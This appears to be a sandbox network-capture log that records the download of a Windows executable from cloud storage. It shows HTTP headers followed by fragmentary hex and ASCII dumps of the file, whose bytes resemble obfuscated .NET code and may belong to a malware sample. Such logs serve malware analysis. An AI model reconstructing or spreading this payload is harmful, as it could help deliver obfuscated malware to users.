                                            x-goog-hash: md5=J6UmDD1ymG9OIqUIZRQwdQ==
                                            x-goog-metageneration: 1
                                            x-goog-storage-class: STANDARD
                                            x-goog-stored-content-encoding: identity
                                            x-goog-stored-content-length: 413184
                                            X-GUploader-UploadID: ADPycdsYKC4VXPddSs6Xe9g82lz1ZZoaMSD06VGl4YB2U5Zg15mTRs5gz8PwNghFMAjCzZt_USTanQR0j1AeRVknD4ATQAO2kQ
                                            X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=reqyiJKaEoFsCALeShIlh1W3LR8JpCvUMFqXcv29IzLGMD5h8uPR%2BXNPvm0g4dUVlGje%2FgW6kZtZHlU3T3z9AP51pKbxiccZNu6x9hAf8w7NSaWcynk%2Fyqr3eF8mqqfNJRvjlA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                            2021-09-27 18:36:57 UTC | 166 | IN | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            2021-09-27 18:36:57 UTC | 166 | IN | Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL+a!0; @@ `
                                            2021-09-27 18:36:57 UTC171INData Raw: 12 00 00 00 2a 00 00 00 22 00 14 a5 25 00 00 02 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 74 00 00 00 01 00 00 11 28 1e 05 00 06 20 02 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 04 00 00 00 1c 00 00 00 05 00 00 00 32 00 00 00 1b 00 00 00 38 17 00 00 00 28 16 05 00 06 20 00 00 00 00 17 3a d6 ff ff ff 26 38 cc ff ff ff 2a 28 36 01 00 06 20 03 00 00 00 17 3a bf ff ff ff 26 38 b5 ff ff ff 28 35 01 00 06 20 01 00 00 00 17 3a a9 ff ff ff 26 38 9f ff ff ff 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00
                                            Data Ascii: *"%********0*0t( 8E28( :&8*(6 :&8(5 :&8****
                                            2021-09-27 18:36:57 UTC173INData Raw: 00 17 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 03 00 79 00 00 00 01 00 00 11 28 1e 05 00 06 20 03 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 04 00 00 00 4c 00 00 00 05 00 00 00 36 00 00 00 20 00 00 00 38 47 00 00 00 28 cd 01 00 06 20 00 00 00 00 16 39 d6 ff ff ff 26 20 00 00 00 00 38 cb ff ff ff 28 cc 01 00 06 20 02 00 00 00 16 39 bb ff ff ff 26 38 b1 ff ff ff 28 98 01 00 06 20 01 00 00 00 16 39 a5 ff ff ff 26 38 9b ff ff ff 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14
                                            Data Ascii: *0*0*0*0y( 8EL6 8G( 9& 8( 9&8( 9&8*********
                                            2021-09-27 18:36:57 UTC174INData Raw: 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 12 00 00 17 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 03 00 04 00 00 00 00 00 00 00 00
                                            Data Ascii: *0*0*0*0*0*0*0**0*0*0*0*0***0*0
                                            2021-09-27 18:36:57 UTC175INData Raw: 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00
                                            Data Ascii: *0*0*0*0*0*0*0*0*0*0*0*0*0*0*0*0
                                            2021-09-27 18:36:57 UTC177INData Raw: 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00
                                            Data Ascii: 0*0*****************************
                                            2021-09-27 18:36:57 UTC178INData Raw: ff ff 2a 28 60 03 00 06 20 02 00 00 00 38 c0 ff ff ff 28 5d 03 00 06 20 01 00 00 00 16 39 b0 ff ff ff 26 38 a6 ff ff ff 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 76 00 00 00 01 00 00 11 28 1e 05 00 06 20 02 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 04 00 00 00 36 00 00 00 37 00 00 00 05 00 00 00 1b 00 00 00 38 31 00 00 00 28 68 03 00 06 20 01 00 00 00 16 39 d6 ff ff ff 26 38 cc ff ff ff 28 69 03 00 06 20 00 00 00 00 17 39 c0 ff ff ff 26 20 00 00 00 00 38 b5 ff ff ff 2a 28 64 03 00 06 20 03 00 00 00 fe 0e 00 00 38 9d ff ff ff 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00
                                            Data Ascii: *(` 8(] 9&8****0*0*0v( 8E6781(h 9&8(i 9& 8*(d 8**
                                            2021-09-27 18:36:57 UTC179INData Raw: 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 22 00 14 a5 2a 00 00 01 2a 00 00 00 13 30 05 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 05 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 17 2a 00 00 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 17 2a 12 00 00 17 2a 00 00 00 13 30 03 00 79 00 00 00 01 00 00 11 28 1e 05 00 06 20 03 00 00
                                            Data Ascii: ***********0*"**0*0*0**0**0*0**0y(
                                            2021-09-27 18:36:57 UTC181INData Raw: ff ff 2a 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 79 00 00 00 01 00 00 11 28 1e 05 00 06 20 02 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 04 00 00 00 4c 00 00 00 05 00 00 00 1b 00 00 00 31 00 00 00 38 47 00 00 00 28 fd 03 00 06 20 03 00 00 00 16 39 d6 ff ff ff 26 38 cc ff ff ff 28 01 04 00 06 20 01 00 00 00 16 39 c0 ff ff ff 26 38 b6 ff ff ff 28 02 04 00 06 20 00 00 00 00 17 3a aa ff ff ff 26 20 00 00 00 00 38 9f ff ff ff 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30
                                            Data Ascii: *******0*0y( 8EL18G( 9&8( 9&8( :& 8*******0
                                            2021-09-27 18:36:57 UTC182INData Raw: 05 00 06 28 16 05 00 06 28 31 06 00 06 2a 00 00 56 28 1e 05 00 06 28 14 05 00 06 28 16 05 00 06 28 31 06 00 06 2a 00 00 56 28 1e 05 00 06 28 14 05 00 06 28 16 05 00 06 28 31 06 00 06 2a 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 01 1c 00 00 00 00 96 00 3d d3 00 2d 16 00 00 01 02 00 5d 00 f6 53 01 35 00 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 34 00 00 02 00 00 00 65 04 00 00 ca 01 00 00 2f 06 00 00 35 00 00 00 00 00 00 00 00 00 00 00 3e 01 00 00 34 00 00 00 72 01 00 00 58 05 00 00 1b 00 00 01 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 1c 00 00 02 00 00 00 5f 00 00 00 c3 01 00 00 22 02 00 00 35 00 00 00 00 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 1c 00
                                            Data Ascii: ((1*V((((1*V((((1*0*0*=-]S50*A4e/5>4rX0*A_"50*A
                                            2021-09-27 18:36:57 UTC183INData Raw: 00 00 00 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00
                                            Data Ascii: ********************************
                                            2021-09-27 18:36:57 UTC185INData Raw: 00 00 38 17 00 00 00 2a 28 f5 04 00 06 20 00 00 00 00 17 3a d5 ff ff ff 26 38 cb ff ff ff 28 16 05 00 06 20 03 00 00 00 38 c0 ff ff ff 28 f6 04 00 06 20 02 00 00 00 17 3a b0 ff ff ff 26 38 a6 ff ff ff 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30 06 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 c6 00 00 00 01 00 00 11 28 1e 05 00 06 20 04 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 06 00 00 00 42 00 00 00 20 00 00 00 05 00 00 00 43 00 00 00 33 00 00 00 59 00 00 00 38 3d 00 00 00 28 fc 04 00 06 20 05 00 00 00 16 3a ce ff ff ff 26 20 05 00
                                            Data Ascii: 8*( :&8( 8( :&8********0*0*0( 8EB C3Y8=( :&
                                            2021-09-27 18:36:57 UTC186INData Raw: 28 06 05 00 06 12 0b 11 0c 11 09 11 0a 1f 0a 1f 11 1f 0b 06 28 06 05 00 06 12 0a 11 0b 11 0c 11 09 1f 0b 1f 16 1f 0c 06 28 06 05 00 06 12 09 11 0a 11 0b 11 0c 1f 0c 1d 1f 0d 06 28 06 05 00 06 12 0c 11 09 11 0a 11 0b 1f 0d 1f 0c 1f 0e 06 28 06 05 00 06 12 0b 11 0c 11 09 11 0a 1f 0e 1f 11 1f 0f 06 28 06 05 00 06 12 0a 11 0b 11 0c 11 09 1f 0f 1f 16 1f 10 06 28 06 05 00 06 12 09 11 0a 11 0b 11 0c 17 1b 1f 11 06 28 07 05 00 06 12 0c 11 09 11 0a 11 0b 1c 1f 09 1f 12 06 28 07 05 00 06 12 0b 11 0c 11 09 11 0a 1f 0b 1f 0e 1f 13 06 28 07 05 00 06 12 0a 11 0b 11 0c 11 09 16 1f 14 1f 14 06 28 07 05 00 06 12 09 11 0a 11 0b 11 0c 1b 1b 1f 15 06 28 07 05 00 06 12 0c 11 09 11 0a 11 0b 1f 0a 1f 09 1f 16 06 28 07 05 00 06 12 0b 11 0c 11 09 11 0a 1f 0f 1f 0e 1f 17 06 28 07
                                            Data Ascii: ((((((((((((((
                                            2021-09-27 18:36:57 UTC187INData Raw: 00 04 3a 0b 00 00 00 28 0f 05 00 06 17 80 c3 00 00 04 7e b4 00 00 04 2a 1e 02 28 1a 00 00 0a 2a 13 30 06 00 73 03 00 00 54 00 00 11 05 8e 69 1a 5d 0a 05 8e 69 1a 5b 0b 05 8e 69 8d 2d 00 00 01 0c 03 8e 69 1a 5b 0d 16 13 04 16 13 05 16 13 06 06 16 3e 04 00 00 00 07 17 58 0b 16 13 07 16 13 08 38 2a 03 00 00 11 08 09 5d 13 09 11 08 1a 5a 13 0a 11 09 1a 5a 13 07 03 11 07 19 58 e0 91 1f 18 62 03 11 07 18 58 e0 91 1f 10 62 60 03 11 07 17 58 e0 91 1e 62 60 03 11 07 e0 91 60 13 05 20 ff 00 00 00 13 0b 16 13 0c 11 08 07 17 59 40 49 00 00 00 06 16 3e 42 00 00 00 16 13 06 11 04 11 05 58 13 04 16 13 0d 38 23 00 00 00 11 0d 16 3e 06 00 00 00 11 06 1e 62 13 06 11 06 05 05 8e 69 17 11 0d 58 59 91 60 13 06 11 0d 17 58 13 0d 11 0d 06 3f d5 ff ff ff 38 32 00 00 00 11 04 11
                                            Data Ascii: :(~*(*0sTi]i[i-i[>X8*]ZZXbXb`Xb`` Y@I>BX8#>biXY`X?82
                                            2021-09-27 18:36:57 UTC189INData Raw: 00 00 f2 09 00 00 e0 0b 00 00 26 0b 00 00 05 00 00 00 4a 00 00 00 21 01 00 00 ef 0b 00 00 0f 0a 00 00 8f 0b 00 00 0d 01 00 00 24 00 00 00 4b 0a 00 00 38 fb 09 00 00 38 e8 09 00 00 20 14 00 00 00 28 76 05 00 06 39 8a ff ff ff 26 20 08 00 00 00 38 7f ff ff ff 11 27 28 4f 05 00 06 39 c2 09 00 00 20 0b 00 00 00 28 75 05 00 06 3a 64 ff ff ff 26 20 01 00 00 00 38 59 ff ff ff 00 11 33 39 4c 00 00 00 20 01 00 00 00 28 76 05 00 06 39 0a 00 00 00 26 38 00 00 00 00 fe 0c 09 00 45 02 00 00 00 26 00 00 00 05 00 00 00 38 21 00 00 00 11 33 28 71 05 00 06 20 00 00 00 00 28 75 05 00 06 39 d8 ff ff ff 26 20 00 00 00 00 38 cd ff ff ff dd ec 0a 00 00 26 20 00 00 00 00 28 75 05 00 06 39 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 2c 00 45 01 00 00 00 05 00 00 00 38 00
                                            Data Ascii: &J!$K88 (v9& 8'(O9 (u:d& 8Y39L (v9&8E&8!3(q (u9& 8& (u9& 8,E8
                                            2021-09-27 18:36:57 UTC190INData Raw: 1a fc ff ff 11 28 1f 22 16 9c 20 13 00 00 00 28 76 05 00 06 39 09 fc ff ff 26 20 07 00 00 00 38 fe fb ff ff 11 33 28 65 05 00 06 20 0b 02 00 00 fe 01 16 fe 01 13 12 20 0b 00 00 00 38 e1 fb ff ff 11 28 1f 20 16 9c 20 29 00 00 00 38 d1 fb ff ff 11 08 11 28 16 20 80 00 00 00 28 66 05 00 06 26 20 24 00 00 00 38 b7 fb ff ff 11 33 28 69 05 00 06 13 35 20 22 00 00 00 38 a4 fb ff ff 11 33 28 69 05 00 06 13 07 20 28 00 00 00 38 91 fb ff ff 11 08 20 86 00 00 00 6a 28 55 05 00 06 20 0a 00 00 00 28 75 05 00 06 3a 75 fb ff ff 26 38 6b fb ff ff 11 08 11 01 11 2b 1f 28 5a 6a 58 1f 10 6a 58 28 55 05 00 06 20 41 00 00 00 28 76 05 00 06 39 4c fb ff ff 26 38 42 fb ff ff 11 32 16 8d 2d 00 00 01 16 16 28 6c 05 00 06 26 20 17 00 00 00 38 2c fb ff ff 11 28 1f 27 16 9c 20 27 00
                                            Data Ascii: (" (v9& 83(e 8( )8( (f& $83(i5 "83(i (8 j(U (u:u&8k+(ZjXjX(U A(v9L&8B2-(l& 8,(' '
                                            2021-09-27 18:36:57 UTC191INData Raw: 5b 01 00 00 20 04 00 00 00 28 76 05 00 06 39 ce ff ff ff 26 38 c4 ff ff ff 72 58 01 00 70 28 51 05 00 06 13 24 20 00 00 00 00 28 76 05 00 06 39 ad ff ff ff 26 38 a3 ff ff ff 38 2b 00 00 00 20 02 00 00 00 38 98 ff ff ff 11 27 28 52 05 00 06 39 aa ff ff ff 20 01 00 00 00 28 76 05 00 06 39 7d ff ff ff 26 38 73 ff ff ff dd 88 00 00 00 26 20 00 00 00 00 28 75 05 00 06 3a 0a 00 00 00 26 38 00 00 00 00 fe 0c 17 00 45 01 00 00 00 05 00 00 00 38 00 00 00 00 dd c3 00 00 00 20 03 00 00 00 38 7d f4 ff ff d0 43 00 00 02 28 4d 05 00 06 6f a3 00 00 0a 28 72 05 00 06 28 73 05 00 06 72 62 01 00 70 28 74 05 00 06 73 40 00 00 0a 7a 16 13 2a 20 06 00 00 00 38 47 f4 ff ff 17 28 4c 05 00 06 20 13 00 00 00 28 76 05 00 06 39 32 f4 ff ff 26 38 28 f4 ff ff 16 13 2a 20 10 00 00 00
                                            Data Ascii: [ (v9&8rXp(Q$ (v9&88+ 8'(R9 (v9}&8s& (u:&8E8 8}C(Mo(r(srbp(ts@z* 8G(L (v92&8(*
                                            2021-09-27 18:36:57 UTC193INData Raw: d9 05 00 00 89 2c 00 00 66 12 00 00 43 1f 00 00 58 1c 00 00 c2 26 00 00 43 2b 00 00 63 08 00 00 f2 15 00 00 62 1f 00 00 7b 27 00 00 a4 0a 00 00 2f 1b 00 00 a8 25 00 00 ac 1e 00 00 1c 25 00 00 32 21 00 00 19 14 00 00 28 00 00 00 11 16 00 00 f5 04 00 00 f8 18 00 00 ac 19 00 00 8e 23 00 00 ea 0d 00 00 24 28 00 00 bd 15 00 00 e8 02 00 00 68 0c 00 00 fc 01 00 00 db 19 00 00 87 13 00 00 c4 1f 00 00 93 19 00 00 db 27 00 00 75 05 00 00 f3 06 00 00 e0 22 00 00 b2 03 00 00 e9 25 00 00 21 27 00 00 89 2b 00 00 6d 2b 00 00 cc 29 00 00 6a 1b 00 00 5b 1e 00 00 ea 11 00 00 c6 10 00 00 5c 05 00 00 1d 29 00 00 d5 08 00 00 c0 12 00 00 bd 0a 00 00 fe 28 00 00 35 0d 00 00 43 0f 00 00 7d 1a 00 00 ca 1a 00 00 1c 04 00 00 cf 1b 00 00 6c 20 00 00 8d 08 00 00 7d 28 00 00 3c 10 00
                                            Data Ascii: ,fCX&C+cb{'/%%2!(#$(h'u"%!'+m+)j[\)(5C}l }(<
                                            2021-09-27 18:36:57 UTC194INData Raw: fe 0e 31 00 20 e2 00 00 00 38 d4 f6 ff ff fe 0c 0a 00 20 1c 00 00 00 20 15 00 00 00 20 10 00 00 00 58 9c 20 f6 00 00 00 38 b5 f6 ff ff fe 0c 0a 00 20 0d 00 00 00 fe 0c 21 00 9c 20 fc 00 00 00 28 75 05 00 06 3a 98 f6 ff ff 26 20 fc 00 00 00 38 8d f6 ff ff fe 0c 25 00 20 0f 00 00 00 20 25 00 00 00 20 54 00 00 00 58 9c 20 46 00 00 00 38 6e f6 ff ff fe 0c 0a 00 20 07 00 00 00 fe 0c 21 00 9c 20 2f 00 00 00 28 76 05 00 06 39 51 f6 ff ff 26 38 47 f6 ff ff fe 0c 25 00 20 0a 00 00 00 fe 0c 31 00 9c 20 0d 01 00 00 38 33 f6 ff ff 11 14 28 54 05 00 06 16 6a 28 55 05 00 06 20 63 00 00 00 28 76 05 00 06 39 16 f6 ff ff 26 38 0c f6 ff ff 20 f7 00 00 00 20 52 00 00 00 59 fe 0e 21 00 20 6a 00 00 00 28 75 05 00 06 3a f2 f5 ff ff 26 38 e8 f5 ff ff fe 0c 0a 00 20 10 00 00 00
                                            Data Ascii: 1 8 X 8 ! (u:& 8% % TX F8n ! /(v9Q&8G% 1 83(Tj(U c(v9&8 RY! j(u:&8
                                            2021-09-27 18:36:57 UTC195INData Raw: 00 58 fe 0e 31 00 20 64 00 00 00 38 79 f1 ff ff 11 14 28 63 05 00 06 20 8f 00 00 00 38 68 f1 ff ff fe 0c 0a 00 20 1f 00 00 00 20 99 00 00 00 20 33 00 00 00 59 9c 20 29 00 00 00 38 49 f1 ff ff fe 0c 25 00 20 04 00 00 00 fe 0c 31 00 9c 20 38 00 00 00 28 75 05 00 06 3a 2c f1 ff ff 26 38 22 f1 ff ff fe 0c 0a 00 20 1f 00 00 00 20 63 00 00 00 20 3c 00 00 00 58 9c 20 de 00 00 00 fe 0e 16 00 38 ff f0 ff ff 20 85 00 00 00 20 3f 00 00 00 59 fe 0e 21 00 20 02 00 00 00 38 ea f0 ff ff fe 0c 0a 00 20 12 00 00 00 fe 0c 21 00 9c 20 41 01 00 00 38 d2 f0 ff ff 20 de 00 00 00 20 4a 00 00 00 59 fe 0e 21 00 20 72 00 00 00 38 b9 f0 ff ff fe 0c 25 00 20 00 00 00 00 fe 0c 31 00 9c 20 24 01 00 00 38 a1 f0 ff ff fe 0c 25 00 20 0c 00 00 00 20 f5 00 00 00 20 51 00 00 00 59 9c 20 49
                                            Data Ascii: X1 d8y(c 8h 3Y )8I% 1 8(u:,&8" c <X 8 ?Y! 8 ! A8 JY! r8% 1 $8% QY I
                                            2021-09-27 18:36:57 UTC196INData Raw: cd 00 00 00 38 32 ed ff ff 20 8e 00 00 00 20 2f 00 00 00 59 fe 0e 31 00 20 45 00 00 00 38 19 ed ff ff 20 9a 00 00 00 20 33 00 00 00 59 fe 0e 21 00 20 2b 00 00 00 28 76 05 00 06 39 fb ec ff ff 26 38 f1 ec ff ff fe 0c 0a 00 20 0e 00 00 00 20 6e 00 00 00 20 64 00 00 00 59 9c 20 a9 00 00 00 28 76 05 00 06 3a d1 ec ff ff 26 20 b6 00 00 00 38 c6 ec ff ff fe 0c 0a 00 20 19 00 00 00 20 31 00 00 00 20 6e 00 00 00 58 9c 20 a4 00 00 00 38 a7 ec ff ff fe 0c 25 00 20 01 00 00 00 20 77 00 00 00 20 4a 00 00 00 58 9c 20 5f 01 00 00 28 76 05 00 06 39 83 ec ff ff 26 38 79 ec ff ff fe 0c 0a 00 20 0c 00 00 00 20 53 00 00 00 20 4b 00 00 00 59 9c 20 c7 00 00 00 28 75 05 00 06 3a 59 ec ff ff 26 38 4f ec ff ff fe 0c 0a 00 20 07 00 00 00 fe 0c 21 00 9c 20 83 00 00 00 28 76 05 00
                                            Data Ascii: 82 /Y1 E8 3Y! +(v9&8 n dY (v:& 8 1 nX 8% w JX _(v9&8y S KY (u:Y&8O ! (v
                                            2021-09-27 18:36:57 UTC198INData Raw: 84 00 00 00 38 d9 e7 ff ff 20 c5 00 00 00 20 6a 00 00 00 59 fe 0e 31 00 20 6f 00 00 00 38 c0 e7 ff ff 20 9c 00 00 00 20 34 00 00 00 59 fe 0e 31 00 20 1d 01 00 00 38 a7 e7 ff ff fe 0c 0a 00 20 1d 00 00 00 fe 0c 21 00 9c 20 c0 00 00 00 38 8f e7 ff ff 20 4b 00 00 00 20 25 00 00 00 58 fe 0e 31 00 20 07 00 00 00 38 76 e7 ff ff fe 0c 25 00 20 05 00 00 00 fe 0c 31 00 9c 20 12 00 00 00 fe 0e 16 00 38 56 e7 ff ff fe 0c 0a 00 20 04 00 00 00 20 7e 00 00 00 20 37 00 00 00 58 9c 20 b2 00 00 00 38 3b e7 ff ff fe 0c 0a 00 20 03 00 00 00 fe 0c 21 00 9c 20 25 00 00 00 28 75 05 00 06 3a 1e e7 ff ff 26 38 14 e7 ff ff fe 0c 0a 00 20 1b 00 00 00 20 ce 00 00 00 20 44 00 00 00 59 9c 20 6d 00 00 00 38 f9 e6 ff ff 20 5b 00 00 00 20 3f 00 00 00 58 fe 0e 21 00 20 4b 01 00 00 38 e0
                                            Data Ascii: 8 jY1 o8 4Y1 8 ! 8 K %X1 8v% 1 8V ~ 7X 8; ! %(u:&8 DY m8 [ ?X! K8
                                            2021-09-27 18:36:57 UTC199INData Raw: ff 20 1b 00 00 00 20 5b 00 00 00 58 fe 0e 21 00 20 52 00 00 00 28 76 05 00 06 39 6a e2 ff ff 26 38 60 e2 ff ff 20 ae 00 00 00 20 3a 00 00 00 59 fe 0e 21 00 20 50 00 00 00 28 75 05 00 06 3a 46 e2 ff ff 26 38 3c e2 ff ff 20 f3 00 00 00 20 51 00 00 00 59 fe 0e 31 00 20 39 01 00 00 38 27 e2 ff ff fe 0c 0a 00 20 03 00 00 00 20 a8 00 00 00 20 38 00 00 00 59 9c 20 48 01 00 00 38 08 e2 ff ff fe 0c 0a 00 20 0f 00 00 00 fe 0c 21 00 9c 20 87 00 00 00 38 f0 e1 ff ff fe 0c 0a 00 20 1c 00 00 00 fe 0c 21 00 9c 20 ac 00 00 00 28 76 05 00 06 39 d3 e1 ff ff 26 38 c9 e1 ff ff fe 0c 0a 00 20 1e 00 00 00 20 ee 00 00 00 20 4f 00 00 00 59 9c 20 64 01 00 00 38 ae e1 ff ff fe 0c 25 00 20 0b 00 00 00 fe 0c 31 00 9c 20 23 00 00 00 28 76 05 00 06 39 91 e1 ff ff 26 38 87 e1 ff ff fe
                                            Data Ascii: [X! R(v9j&8` :Y! P(u:F&8< QY1 98' 8Y H8 ! 8 ! (v9&8 OY d8% 1 #(v9&8
